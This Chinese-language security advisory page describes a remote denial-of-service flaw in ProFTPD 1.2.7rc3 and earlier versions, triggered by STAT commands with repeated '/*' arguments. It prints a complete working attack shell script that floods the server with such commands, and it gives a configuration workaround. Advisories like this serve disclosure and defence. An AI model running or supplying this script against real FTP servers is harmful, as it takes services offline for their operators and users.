ProFTPD 畸形STAT指令参数远程DoS缺陷
ProFTPD 畸形STAT指令参数远程DoS缺陷
图-ProFTPD
ProFTPD 畸形STAT指令参数远程DoS缺陷:
涉及程序:
ProFTPD 1.2.7
描述:
ProFTPD 畸形STAT指令参数远程DoS缺陷
详细:
ProFTPD是Unix和Linux操作系统下的源代码开放的FTP服务程序。
ProFTPD对用户递交的STAT指令参数缺乏正确过滤,当攻击者向ProFTPD服务程序提交参数中含有多个'/*'字符的STAT指令时,将会导致FTP服务崩溃,拒绝服务。
受影响系统:
ProFTPD 1.2.7 rc3 及所有之前版本
攻击方法:
- #!/bin/sh
- # proftpd <=1.2.7rc3 DoS - Requires anonymous/ftp login at least
- # might work against many other FTP daemons
- # consumes nearly all memory and alot of CPU
- # tested against slackware 8.1 - proftpd 1.2.4 and 1.2.7rc3
- # 7-dec-02 - detach - www.duho.org
- # use: ./prodos.sh
- # do this some more to make sure the system eventually dies
- cnt=25
- while [ $cnt -gt 0 ] ; do
- ftp -n << EOF&
- o $1
- quote user $2
- quote pass $3
- quote stat /*/*/*/*/*/*/*
- quit
- EOF
- let cnt=cnt-1
- done
- sleep 2
- killall -9 ftp
- echo DONE!
- #end
解决方案:
目前厂商还没有提供补丁或升级程序,建议用户随时关注厂商站点:
http://www.proftpd.org
临时解决方案:
* 在文件'proftpd.conf'中添加如下一行(目前暂时还没有经过测试):
DenyFilter \*.*/
通过正文,我们可以清楚的知道ProFTPD出错错在哪里,赶快修正去吧!
- proftpd支持上传sfv校验的方法
- FTP服务 Proftpd + mysql + quota
- 使用MySQL认证ProFTPD用户需要什么
- Proftpd中Limit的使用
- ProFTPD服务器安全策略
- Proftpd 大虾的学习笔记
- ProFTPD 详细解析
评论暂时关闭